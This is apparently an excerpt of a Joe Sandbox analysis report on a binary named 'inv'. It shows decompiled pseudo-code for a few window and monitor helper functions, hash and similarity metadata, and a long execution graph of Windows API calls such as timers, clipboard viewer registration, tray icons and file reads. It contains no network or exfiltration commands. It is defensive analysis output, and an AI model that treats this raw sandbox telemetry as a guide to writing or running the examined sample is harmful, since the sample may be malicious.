                                  • Instruction Fuzzy Hash: 7D118231A042589BC711EAADD884BDF7BE89F49314F440196FC04F7342D779DD0587A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 54%
                                  			E00442180(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				char _v16;
                                  				intOrPtr _t12;
                                  				intOrPtr _t16;
                                  				intOrPtr _t23;
                                  				char _t24;
                                  				intOrPtr _t25;
                                  				intOrPtr _t26;
                                  				void* _t30;
                                  				void* _t31;
                                  				intOrPtr _t32;
                                  
                                  				_t30 = _t31;
                                  				_t32 = _t31 + 0xfffffff4;
                                  				_v8 = 0;
                                  				_t23 =  *0x44dc28; // 0x0
                                  				_v12 = _t23;
                                  				_t24 =  *0x44dc34; // 0x0
                                  				_v16 = _t24;
                                  				 *0x44dc28 = __eax;
                                  				 *0x44dc34 = 0;
                                  				_push(_t30);
                                  				_push(0x442223);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t32;
                                  				_push(_t30);
                                  				_push(0x4421ec);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t32;
                                  				_push(0);
                                  				_push(E00442130);
                                  				_push(GetCurrentThreadId());
                                  				L00406258();
                                  				_t12 =  *0x44dc34; // 0x0
                                  				_v8 = _t12;
                                  				_pop(_t25);
                                  				 *[fs:eax] = _t25;
                                  				_pop(_t26);
                                  				 *[fs:eax] = _t26;
                                  				_push(0x44222a);
                                  				_t5 =  &_v16; // 0x4246e2
                                  				 *0x44dc34 =  *_t5;
                                  				_t16 = _v12;
                                  				 *0x44dc28 = _t16;
                                  				return _t16;
                                  			}

                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 004421CF
                                  • 72E7AC10.USER32(00000000,00442130,00000000,00000000,004421EC,?,00000000,00442223), ref: 004421D5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CurrentThread
                                  • String ID: FB
                                  • API String ID: 2882836952-3670039715
                                  • Opcode ID: 4a59a1d64780181187bb131d7dcadb3780944814a00689025a252e310b40bdd9
                                  • Instruction ID: 7b415869748b168d5e1ebce3305042971c155c3e1f7520a5458ac82b162e55ca
                                  • Opcode Fuzzy Hash: 4a59a1d64780181187bb131d7dcadb3780944814a00689025a252e310b40bdd9
                                  • Instruction Fuzzy Hash: E4019675E09704AFE311CFA5ED9190ABBF9F74E720B618476F404D3750EAB45510CA1C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E00421DD0(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t15;
                                  				void* _t16;
                                  				intOrPtr _t18;
                                  				signed int _t19;
                                  				void* _t20;
                                  				intOrPtr _t21;
                                  
                                  				_t19 = _a12;
                                  				if( *0x44f923 != 0) {
                                  					_t16 = 0;
                                  					if((_t19 & 0x00000003) != 0) {
                                  						L7:
                                  						_t16 = 0x12340042;
                                  					} else {
                                  						_t21 = _a4;
                                  						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
                                  							goto L7;
                                  						}
                                  					}
                                  				} else {
                                  					_t18 =  *0x44f904; // 0x421dd0
                                  					 *0x44f904 = E00421B38(3, _t15, _t18, _t19, _t20);
                                  					_t16 =  *0x44f904(_a4, _a8, _t19);
                                  				}
                                  				return _t16;
                                  			}

                                  APIs
                                  • GetSystemMetrics.USER32 ref: 00421E1E
                                  • GetSystemMetrics.USER32 ref: 00421E30
                                    • Part of subcall function 00421B38: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00421BB8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: MetricsSystem$AddressProc
                                  • String ID: MonitorFromPoint
                                  • API String ID: 1792783759-1072306578
                                  • Opcode ID: 9d614789823488b2eca96f45fa1d93b85254b0525a0d9d49b36da00db30eeb90
                                  • Instruction ID: 5987f07c728842c166cb19a2da79ffc1c9c3cf802d369183a20eeec826430bf5
                                  • Opcode Fuzzy Hash: 9d614789823488b2eca96f45fa1d93b85254b0525a0d9d49b36da00db30eeb90
                                  • Instruction Fuzzy Hash: 2601A235301228AFDB105F55EC44B9BBBA6EB61394F824036FD159B221C374AC4587A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E00421CA8(intOrPtr* _a4, signed int _a8) {
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				intOrPtr* _t14;
                                  				intOrPtr _t16;
                                  				signed int _t17;
                                  				void* _t18;
                                  				void* _t19;
                                  
                                  				_t17 = _a8;
                                  				_t14 = _a4;
                                  				if( *0x44f922 != 0) {
                                  					_t19 = 0;
                                  					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
                                  						_t19 = 0x12340042;
                                  					}
                                  				} else {
                                  					_t16 =  *0x44f900; // 0x421ca8
                                  					 *0x44f900 = E00421B38(2, _t14, _t16, _t17, _t18);
                                  					_t19 =  *0x44f900(_t14, _t17);
                                  				}
                                  				return _t19;
                                  			}












                                  APIs
                                  • GetSystemMetrics.USER32 ref: 00421CF9
                                  • GetSystemMetrics.USER32 ref: 00421D05
                                    • Part of subcall function 00421B38: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00421BB8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: MetricsSystem$AddressProc
                                  • String ID: MonitorFromRect
                                  • API String ID: 1792783759-4033241945
                                  • Opcode ID: a85dedd3e8941d8be2955b3a7ce186d5f3c83006fb37a35aa4054ddce9411918
                                  • Instruction ID: 437691efd68d69f09259f170b25e717ba68ea7445576b7cb15c50e2da24a8300
                                  • Opcode Fuzzy Hash: a85dedd3e8941d8be2955b3a7ce186d5f3c83006fb37a35aa4054ddce9411918
                                  • Instruction Fuzzy Hash: 1601A235300228EFD7109B54F885B16B764E762355FA44072E804DB226C378EC44CBB8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:2.3%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:1283
                                  Total number of Limit Nodes:35

                                  Graph

                                  execution_graph 76916 41ae71 76917 41ae84 76916->76917 76929 41aea4 76917->76929 76931 44e80b 10 API calls 76917->76931 76918 41af01 76921 41af4b 76918->76921 76925 41af22 SetTimer 76918->76925 76919 41af3f 76919->76921 76932 416000 KillTimer 76919->76932 76924 41af58 76921->76924 76933 401f02 49 API calls 76921->76933 76930 41af7e 76924->76930 76934 40137d 37 API calls 76924->76934 76925->76921 76926 41af8c GetTickCount 76928 41aebd 76926->76928 76929->76918 76929->76919 76929->76928 76930->76926 76930->76928 76931->76929 76932->76921 76933->76924 76934->76930 76935 404512 76936 40451d 76935->76936 76969 43aa38 76936->76969 76938 402d18 GetTickCount 76940 402d34 PeekMessageA 76938->76940 76951 402cf9 76938->76951 76941 402d56 GetTickCount 76940->76941 76942 402d4b 76940->76942 76941->76951 76942->76941 76943 402e16 GetTickCount 76943->76951 76953 402e47 76943->76953 76944 4029b5 169 API calls 76944->76951 76945 40903d 86 API calls 76945->76951 76946 41a263 50 API calls 76946->76951 76947 425baf 137 API calls 76947->76951 76950 442502 49 API calls 76950->76951 76951->76938 76951->76943 76951->76944 76951->76945 76951->76946 76951->76947 76951->76950 76952 416d44 37 API calls 76951->76952 76951->76953 76956 40184e 47 API calls 76951->76956 76958 43eb88 41 API calls 76951->76958 76962 409f1b 137 API calls 76951->76962 76994 44374a GlobalUnlock CloseClipboard 76951->76994 76995 401fbc 49 API calls 76951->76995 76996 4016b8 169 API calls 76951->76996 76997 40a134 137 API calls 5 library calls 76951->76997 76998 419c22 38 API calls 2 library calls 76951->76998 76999 43ea10 26 API calls ___initmbctable 76951->76999 77002 4013a5 176 API calls 76951->77002 77003 401d5e 47 API calls 76951->77003 77004 443c79 84 API calls 76951->77004 77005 401abf 92 API calls 76951->77005 77006 417d99 137 API calls 76951->77006 77007 44c1bc 137 API calls 2 library calls 76951->77007 76952->76951 76953->76951 76965 40332f RegCloseKey 76953->76965 77000 
419eef 38 API calls 76953->77000 77001 40a357 39 API calls 3 library calls 76953->77001 76956->76951 76958->76951 76962->76951 76965->76951 76970 43b175 74 API calls 76969->76970 76971 43aa4f 76970->76971 76972 43ab41 76971->76972 76973 43aa5a GetWindowRect 76971->76973 76972->76951 76973->76972 76974 43aa6d 76973->76974 76975 43aa90 76974->76975 76976 442502 49 API calls 76974->76976 76978 442502 49 API calls 76975->76978 76986 43aab7 76975->76986 76977 43aa84 76976->76977 76977->76975 77008 40137d 37 API calls 76977->77008 76981 43aaab 76978->76981 76980 442502 49 API calls 76983 43aad1 76980->76983 76981->76986 77009 40137d 37 API calls 76981->77009 76985 43aadd 76983->76985 77010 40137d 37 API calls 76983->77010 76984 43ab01 MoveWindow 76984->76972 76989 43ab2a 76984->76989 76985->76984 76988 442502 49 API calls 76985->76988 76986->76980 76986->76985 76991 43aaf5 76988->76991 76989->76972 76993 43ab38 Sleep 76989->76993 76991->76984 77011 40137d 37 API calls 76991->77011 76993->76972 76994->76938 76995->76951 76996->76951 76997->76951 76998->76951 76999->76951 77000->76953 77001->76953 77002->76951 77003->76951 77004->76951 77005->76951 77006->76951 77007->76951 77008->76975 77009->76986 77010->76985 77011->76984 75495 426406 75496 426415 RegisterWindowMessageA 75495->75496 75497 42642c 75495->75497 75496->75497 75498 42649c 75497->75498 75499 42694d 75497->75499 75547 42646f 75497->75547 75501 4265b1 75498->75501 75506 426545 75498->75506 75534 4264ab 75498->75534 75500 42695a 75499->75500 75513 426b0d 75499->75513 75504 426a90 75500->75504 75505 426960 75500->75505 75503 426b54 DefWindowProcA 75501->75503 75501->75547 75502 426bb0 GetCurrentProcessId 75502->75547 75503->75547 75508 426ac4 75504->75508 75514 426aa3 75504->75514 75515 426ace 75504->75515 75509 426a49 75505->75509 75536 42696d 75505->75536 75506->75501 75511 42655b 75506->75511 75512 426909 75506->75512 75507 426b9a 75507->75502 75508->75503 75508->75515 75516 426a52 PostMessageA 75509->75516 
75517 426a1a 75509->75517 75510 4265c0 75521 4265d1 75510->75521 75548 4265fb 75510->75548 75511->75501 75511->75510 75518 4268d9 75511->75518 75538 42656e 75511->75538 75595 4258ab 215 API calls 75512->75595 75513->75502 75513->75507 75519 426b29 75513->75519 75520 426b7f PostMessageA 75513->75520 75514->75503 75524 426aab 75514->75524 75525 426ad5 PostMessageA 75515->75525 75526 426aed 75515->75526 75516->75517 75533 426a84 SendMessageTimeoutA 75517->75533 75517->75547 75518->75503 75530 4268fb ShowWindow 75518->75530 75527 426b66 IsWindow 75519->75527 75528 426b2e 75519->75528 75603 40de0c GetTickCount 75520->75603 75529 4265da MoveWindow 75521->75529 75521->75530 75523 4264da 75523->75503 75537 4264e9 75523->75537 75599 43746b 82 API calls 75524->75599 75525->75547 75545 426b00 75526->75545 75526->75547 75539 426b71 GetWindowTextA 75527->75539 75527->75547 75528->75503 75601 417c4c LoadImageA Shell_NotifyIconA ___initmbctable 75528->75601 75529->75547 75530->75547 75531 426914 75531->75503 75540 42691f 75531->75540 75533->75547 75534->75510 75534->75523 75542 4264ca 75534->75542 75543 4264fe 75534->75543 75534->75547 75536->75517 75536->75520 75536->75528 75544 42699e 75536->75544 75537->75547 75594 417d99 137 API calls 75537->75594 75538->75528 75546 426579 GetMenu CheckMenuItem 75538->75546 75539->75547 75540->75547 75541 426b91 75541->75507 75541->75547 75542->75510 75549 4264d3 75542->75549 75543->75503 75550 42650d SetFocus 75543->75550 75551 426a07 PostMessageA 75544->75551 75552 4269a5 75544->75552 75600 44c66d 137 API calls ___initmbctable 75545->75600 75546->75501 75546->75503 75548->75501 75548->75503 75561 42667d 75548->75561 75565 4267e7 75548->75565 75549->75523 75549->75528 75550->75547 75551->75517 75552->75528 75556 4269b1 75552->75556 75558 4269c6 75556->75558 75596 44374a GlobalUnlock CloseClipboard 75556->75596 75557 426b4b 75602 40d84f LoadImageA Shell_NotifyIconA 75557->75602 75597 43b959 GetCurrentProcessId EnumWindows 75558->75597 75566 
426682 75561->75566 75567 4266f6 75561->75567 75563 4269cb 75563->75547 75568 4269d5 75563->75568 75564 426802 GetClientRect 75571 426826 75564->75571 75565->75547 75565->75564 75566->75503 75574 4266a7 75566->75574 75577 4266a3 75566->75577 75569 426701 GetClientRect 75567->75569 75570 4267b8 75567->75570 75598 43c3f2 54 API calls 75568->75598 75589 42672c ExcludeClipRect CreateRectRgn GetClipRgn 75569->75589 75570->75503 75573 4267c2 GetClipBox FillRect 75570->75573 75576 426886 MoveWindow InvalidateRect 75571->75576 75582 42685a MoveWindow 75571->75582 75583 426869 75571->75583 75573->75547 75578 4266c0 SetBkColor 75574->75578 75575 4269e6 75575->75547 75581 4269ef SetTimer 75575->75581 75576->75547 75577->75574 75584 4266b8 GetSysColor 75577->75584 75579 4266d1 SetTextColor 75578->75579 75580 4266db 75578->75580 75579->75580 75580->75547 75587 4266e9 GetSysColorBrush 75580->75587 75581->75547 75582->75583 75585 426870 MoveWindow 75583->75585 75586 426881 75583->75586 75584->75578 75585->75586 75586->75576 75587->75547 75591 42679a 75589->75591 75592 42679e GetSysColorBrush 75589->75592 75593 4267a6 FillRgn DeleteObject 75591->75593 75592->75593 75593->75547 75594->75547 75595->75531 75596->75558 75597->75563 75604 43b883 GetWindowThreadProcessId GetClassNameA 75597->75604 75598->75575 75599->75540 75600->75547 75601->75557 75602->75503 75603->75541 75605 447741 75615 44774e 75605->75615 75607 447ac4 75608 44783e 75608->75607 75649 401c1f 75608->75649 75610 442502 49 API calls 75610->75615 75611 447869 75656 447d15 GetModuleFileNameA 75611->75656 75614 44788a 75614->75607 75666 450782 75614->75666 75615->75607 75615->75608 75615->75610 75728 40a7af 32 API calls _write_multi_char 75615->75728 75729 40184e 75615->75729 75617 4478b4 75617->75607 75618 447973 75617->75618 75619 44797c FindWindowA 75617->75619 75620 44790b 75617->75620 75618->75619 75621 4479fe 75618->75621 75619->75621 75630 44796c PostMessageA Sleep 75619->75630 75620->75621 75622 447917 
FindWindowA 75620->75622 75686 43c3b0 75621->75686 75622->75621 75626 447933 75622->75626 75626->75607 75626->75630 75628 4479ec IsWindow 75629 4479f5 Sleep 75628->75629 75634 4479bb 75628->75634 75629->75621 75630->75628 75631 447a0a 75631->75607 75713 441f68 29 API calls __getbuf 75631->75713 75632 4479e5 Sleep 75632->75628 75634->75607 75634->75632 75635 447a21 75636 447a36 ___initmbctable 75635->75636 75750 43f68a 75635->75750 75637 447a93 75636->75637 75638 447a5c GetModuleHandleA GetProcAddress 75636->75638 75753 4114b4 92 API calls 75637->75753 75640 447a77 75638->75640 75641 447a8d #17 75638->75641 75640->75637 75641->75637 75643 447a98 75644 447ab2 75643->75644 75645 447ab9 75643->75645 75754 409ef4 47 API calls 75644->75754 75714 447561 75645->75714 75648 447ac0 75648->75607 75650 401c27 75649->75650 75651 401c4b 75650->75651 75654 401c58 75650->75654 75755 401dcc 47 API calls 75651->75755 75653 401c52 75653->75611 75654->75653 75756 401dcc 47 API calls 75654->75756 75757 43892a 75656->75757 75658 447efe 75658->75614 75659 447d4d _strlen _strrchr 75659->75658 75661 447da9 75659->75661 75768 442502 75659->75768 75661->75658 75773 40a6d3 32 API calls 75661->75773 75663 447e50 75663->75658 75664 447e6f GetModuleFileNameA 75663->75664 75665 447e8d _strlen _strrchr 75664->75665 75665->75658 75667 4507ab 75666->75667 75668 4508a7 75666->75668 75667->75668 75780 44e80b 10 API calls 75667->75780 75668->75617 75670 4507ba 75670->75668 75781 4481e0 75670->75781 75672 4507ef 75672->75668 75833 44b395 59 API calls 2 library calls 75672->75833 75674 450804 75674->75668 75834 44deb1 148 API calls 75674->75834 75676 450817 75676->75668 75677 45081f SetCurrentDirectoryA 75676->75677 75835 44b395 59 API calls 2 library calls 75677->75835 75679 45083a 75679->75668 75836 44b395 59 API calls 2 library calls 75679->75836 75681 45084a 75681->75668 75837 44e24c 137 API calls 75681->75837 75683 450868 75683->75668 75684 40184e 47 API calls 75683->75684 75685 450895 
GetSystemTimeAsFileTime 75684->75685 75685->75668 75687 43c3c3 KiUserCallbackDispatcher 75686->75687 75688 43c3bb 75686->75688 75689 43c3ef 75687->75689 75690 43c3dc 75687->75690 75688->75687 75688->75689 75692 447adc 75689->75692 75690->75689 75691 43c3e4 SystemParametersInfoA 75690->75691 75691->75689 75693 447af7 75692->75693 75699 447b6e 75692->75699 75694 447aff LoadImageA LoadCursorA RegisterClassExA 75693->75694 75693->75699 75695 447b86 RegisterClassExA 75694->75695 75694->75699 75696 447b9f GetForegroundWindow 75695->75696 75695->75699 75697 447ba9 GetClassNameA 75696->75697 75703 447bc8 CreateWindowExA 75696->75703 75700 447bba 75697->75700 75697->75703 75699->75631 75701 442502 49 API calls 75700->75701 75701->75703 75702 447c16 GetMenu EnableMenuItem 76028 417cff EnableMenuItem EnableMenuItem EnableMenuItem EnableMenuItem 75702->76028 75703->75699 75703->75702 75705 447c3a CreateWindowExA 75705->75699 75706 447c86 SendMessageA ShowWindow ShowWindow 75705->75706 75707 447cb0 ShowWindow SetWindowLongA 75706->75707 75708 447cc9 LoadAcceleratorsA 75706->75708 75707->75708 75709 447ce7 75708->75709 75710 447cec 75708->75710 75709->75699 75712 447cfb SetClipboardViewer 75709->75712 76029 417c4c LoadImageA Shell_NotifyIconA ___initmbctable 75710->76029 75712->75699 75713->75635 75715 43f68a __getbuf 6 API calls 75714->75715 75716 447579 75715->75716 75717 447585 75716->75717 75718 44759f SetTimer 75716->75718 75717->75648 75719 4475d2 GetTickCount 75718->75719 75724 4475ca 75718->75724 75720 447622 GetTickCount 75719->75720 75721 447608 SetTimer 75719->75721 75722 447648 75720->75722 75721->75720 75723 447658 KillTimer 75722->75723 75722->75724 75723->75724 75725 40184e 47 API calls 75724->75725 75726 4476c5 75725->75726 75726->75717 76030 417d99 137 API calls 75726->76030 75728->75615 75731 40185d 75729->75731 75730 401877 _strlen 75732 401896 75730->75732 75733 4018ed 75730->75733 75731->75730 76032 401d9f 75731->76032 75735 4018d7 75732->75735 75736 40189c 
75732->75736 75737 401935 75733->75737 75738 401919 75733->75738 75749 4018aa __shift 75733->75749 76036 443b6b GlobalAlloc GlobalLock GlobalFree 75735->76036 76031 443bda 15 API calls _strlen 75736->76031 75743 401996 75737->75743 75748 40194c 75737->75748 75737->75749 76037 4017d8 HeapFree VirtualFree VirtualFree HeapFree ___initmbctable 75738->76037 75742 4018e2 75742->75749 76038 44e80b 10 API calls 75743->76038 75744 401a62 75747 43f68a __getbuf 6 API calls 75744->75747 75744->75749 75747->75744 75748->75744 75748->75749 76039 43ec47 HeapFree VirtualFree VirtualFree HeapFree ___initmbctable 75748->76039 75749->75615 76041 43f65e 75750->76041 75753->75643 75754->75645 75755->75653 75756->75653 75758 438a64 _strcat 75757->75758 75759 438941 _strlen 75757->75759 75758->75659 75759->75758 75761 438974 75759->75761 75778 442990 49 API calls ___initmbctable 75759->75778 75761->75758 75762 438a39 FindFirstFileA 75761->75762 75763 4389ee FindFirstFileA 75761->75763 75762->75758 75764 438a40 FindClose 75762->75764 75763->75758 75765 4389fb FindClose 75763->75765 75766 40a76e 32 API calls 75764->75766 75774 40a76e 75765->75774 75766->75758 75769 442510 75768->75769 75771 44250b 75768->75771 75770 4428bb 49 API calls 75769->75770 75772 44253d 75769->75772 75770->75769 75771->75661 75772->75661 75773->75663 75775 40a77a _strlen 75774->75775 75776 40a786 75775->75776 75779 40a718 32 API calls _write_multi_char 75775->75779 75776->75761 75778->75761 75779->75776 75780->75670 75782 4481ef ___initmbctable 75781->75782 75785 448267 75782->75785 75838 4508c7 75782->75838 75785->75672 75788 450c9f 46 API calls 75789 4482bf 75788->75789 75790 450c9f 46 API calls 75789->75790 75811 44829c _strcat __shift _strlen 75789->75811 75791 4482eb 75790->75791 75792 450c9f 46 API calls 75791->75792 75791->75811 75794 44830f 75792->75794 75793 44933b 75795 449378 ___initmbctable 75793->75795 75914 449d8e 85 API calls 4 library calls 75793->75914 75796 4493a8 75794->75796 75794->75811 75916 
43ec47 HeapFree VirtualFree VirtualFree HeapFree ___initmbctable 75795->75916 75918 450aac 26 API calls 75796->75918 75800 449361 75800->75795 75802 448ee2 75800->75802 75801 449397 75917 450aac 26 API calls 75801->75917 75915 4505f8 26 API calls ___initmbctable 75802->75915 75805 40a7af 32 API calls 75805->75811 75806 449d8e 85 API calls 75806->75811 75807 442990 49 API calls 75807->75811 75809 41d1a8 60 API calls 75809->75811 75810 44947c 49 API calls 75810->75811 75811->75793 75811->75802 75811->75805 75811->75806 75811->75807 75811->75809 75811->75810 75812 442545 49 API calls 75811->75812 75815 40a6d3 32 API calls 75811->75815 75816 44b395 59 API calls 75811->75816 75817 44fadc 49 API calls 75811->75817 75826 4493d8 49 API calls 75811->75826 75831 448d22 IsCharUpperA 75811->75831 75832 442502 49 API calls 75811->75832 75901 43cc34 37 API calls ___initmbctable 75811->75901 75902 44f2cb 58 API calls ___initmbctable 75811->75902 75903 410c74 76 API calls 75811->75903 75904 410faf 49 API calls ___initmbctable 75811->75904 75906 410faf 49 API calls ___initmbctable 75811->75906 75908 410401 49 API calls 75811->75908 75909 40f8c1 52 API calls 2 library calls 75811->75909 75910 410b93 49 API calls 75811->75910 75911 4119b4 10 API calls ___initmbctable 75811->75911 75912 410376 78 API calls 75811->75912 75913 439871 49 API calls _strlen 75811->75913 75812->75811 75815->75811 75816->75811 75817->75811 75821 448c89 GetKeyboardLayout 75905 415b93 51 API calls _strlen 75821->75905 75826->75811 75828 448cc3 GetKeyboardLayout 75907 415b93 51 API calls _strlen 75828->75907 75831->75811 75832->75811 75833->75674 75834->75676 75835->75679 75836->75681 75837->75683 75919 450f56 75838->75919 75842 450905 _strlen 75842->75842 75859 448263 75842->75859 75924 458d16 75842->75924 75849 458c2d 12 API calls 75850 45098d 75849->75850 75851 458d16 21 API calls 75850->75851 75856 450998 75851->75856 75852 4509d8 75853 450a19 75852->75853 75855 458d16 21 API calls 75852->75855 75949 43ea10 
26 API calls ___initmbctable 75853->75949 75854 458c2d 12 API calls 75854->75856 75858 4509ed 75855->75858 75856->75852 75856->75854 75860 458c2d 12 API calls 75858->75860 75859->75785 75872 450c9f 75859->75872 75861 4509fb 75860->75861 75861->75853 75862 458c2d 12 API calls 75861->75862 75863 450a2a 75862->75863 75863->75853 75864 450a42 75863->75864 75865 458c2d 12 API calls 75864->75865 75866 450a50 75865->75866 75867 458c2d 12 API calls 75866->75867 75868 450a67 75867->75868 75945 450aba 75868->75945 75871 458ad4 2 API calls 75871->75859 75873 450cb6 75872->75873 75874 458d16 21 API calls 75873->75874 75875 450cc2 75874->75875 76024 450dca 32 API calls 75875->76024 75877 450cd6 75878 448298 75877->75878 75879 458c2d 12 API calls 75877->75879 75878->75788 75878->75811 75880 450cf4 75879->75880 75881 458c2d 12 API calls 75880->75881 75882 450d02 75881->75882 75883 458c2d 12 API calls 75882->75883 75884 450d19 75883->75884 75885 458d16 21 API calls 75884->75885 75886 450d30 75885->75886 75887 43f68a __getbuf 6 API calls 75886->75887 75888 450d3a 75887->75888 75889 43f68a __getbuf 6 API calls 75888->75889 75890 450d46 75889->75890 75891 458c2d 12 API calls 75890->75891 75892 450d53 75891->75892 75893 450aba GetTickCount 75892->75893 75894 450d6e 75893->75894 75895 450dad 75894->75895 75897 450d73 75894->75897 76027 43ec47 HeapFree VirtualFree VirtualFree HeapFree ___initmbctable 75895->76027 76025 450fea 45 API calls 75897->76025 75899 450da4 76026 43ec47 HeapFree VirtualFree VirtualFree HeapFree ___initmbctable 75899->76026 75901->75811 75902->75811 75903->75811 75904->75821 75905->75811 75906->75828 75907->75811 75908->75811 75909->75811 75910->75811 75911->75811 75912->75811 75913->75811 75914->75800 75915->75785 75916->75801 75917->75785 75918->75785 75920 4508e0 GetModuleFileNameA 75919->75920 75921 43eb88 75920->75921 75950 43eb5e 75921->75950 75923 43eb97 75923->75842 75925 458d23 75924->75925 75931 450964 75924->75931 75926 458d46 75925->75926 75927 458ad4 
2 API calls 75925->75927 75925->75931 76015 43ea66 19 API calls _write_multi_char 75926->76015 75927->75926 75929 458d53 75930 43f4ed _write_multi_char 2 API calls 75929->75930 75930->75931 75932 458c2d 75931->75932 75935 450975 75932->75935 75936 458c51 75932->75936 75934 440b23 6 API calls 75934->75936 75937 458ad4 75935->75937 75936->75934 75936->75935 76016 43cd10 75936->76016 75938 458aed 75937->75938 75939 43f4ed _write_multi_char 2 API calls 75938->75939 75940 458af9 75939->75940 75941 45097c 75940->75941 75942 43f4ed _write_multi_char 2 API calls 75940->75942 75941->75849 75943 458bbc 75942->75943 75943->75941 75944 43f4ed _write_multi_char 2 API calls 75943->75944 75944->75941 75947 450ac4 75945->75947 75946 450a7a 75946->75871 75947->75946 76023 415edb GetTickCount 75947->76023 75949->75859 75956 442009 75950->75956 75953 43eb67 75953->75923 75957 44201c 75956->75957 75959 43eb63 75956->75959 75958 43f68a __getbuf 6 API calls 75957->75958 75957->75959 75958->75959 75959->75953 75960 43d0a4 75959->75960 75963 43d0c3 75960->75963 75961 43d1e0 75961->75923 75963->75961 75964 43fc06 75963->75964 75965 43fc21 75964->75965 75973 43fc90 _write_multi_char 75965->75973 75986 43fed6 75965->75986 75968 43fdbf CreateFileA 75969 43fdf0 GetLastError 75968->75969 75970 43fdde GetFileType 75968->75970 75969->75973 75971 43fde9 CloseHandle 75970->75971 75972 43fdff 75970->75972 75971->75969 75990 440029 SetStdHandle 75972->75990 75973->75961 75975 43fe1a 75975->75973 75991 43f4ed 75975->75991 75977 43fe58 75984 43fe63 75977->75984 76003 440b23 75977->76003 75980 43fed0 75981 43fe9b 75982 43feb1 75981->75982 76013 43db69 23 API calls 2 library calls 75981->76013 75983 43f4ed _write_multi_char 2 API calls 75982->75983 75982->75984 75983->75984 75984->75973 75996 43dcc5 75984->75996 75988 43feeb 75986->75988 75987 43f68a __getbuf 6 API calls 75989 43fd9e 75987->75989 75988->75987 75988->75989 75989->75968 75989->75973 75990->75975 75992 43f4fc _write_multi_char 75991->75992 
75994 43f545 _write_multi_char 75991->75994 75993 43f525 SetFilePointer 75992->75993 75992->75994 75993->75994 75995 43f53d GetLastError 75993->75995 75994->75977 75995->75994 75999 43dcd9 _write_multi_char 75996->75999 76002 43dd46 _write_multi_char 75996->76002 75997 43dd3e 76014 43ff73 SetStdHandle 75997->76014 75999->75997 76000 43dd28 FindCloseChangeNotification 75999->76000 75999->76002 76000->75997 76001 43dd34 GetLastError 76000->76001 76001->75997 76002->75980 76005 440b3b 76003->76005 76007 440bbe _write_multi_char 76003->76007 76004 440b98 ReadFile 76006 440bb1 GetLastError 76004->76006 76010 440be1 76004->76010 76005->76004 76005->76007 76006->76007 76007->75981 76008 440c5d ReadFile 76009 440c7b GetLastError 76008->76009 76011 440c85 76008->76011 76009->76010 76009->76011 76010->76007 76010->76008 76011->76010 76012 43f4ed _write_multi_char 2 API calls 76011->76012 76012->76011 76013->75982 76014->76002 76015->75929 76017 43cd20 76016->76017 76021 43cd2c 76016->76021 76018 43cd49 76017->76018 76017->76021 76022 43d060 6 API calls __getbuf 76017->76022 76020 440b23 6 API calls 76018->76020 76020->76021 76021->75936 76022->76018 76023->75947 76024->75877 76025->75899 76026->75878 76027->75878 76028->75705 76029->75709 76030->75717 76031->75749 76034 401da6 76032->76034 76033 401dc0 76033->75730 76034->76033 76040 401dcc 47 API calls 76034->76040 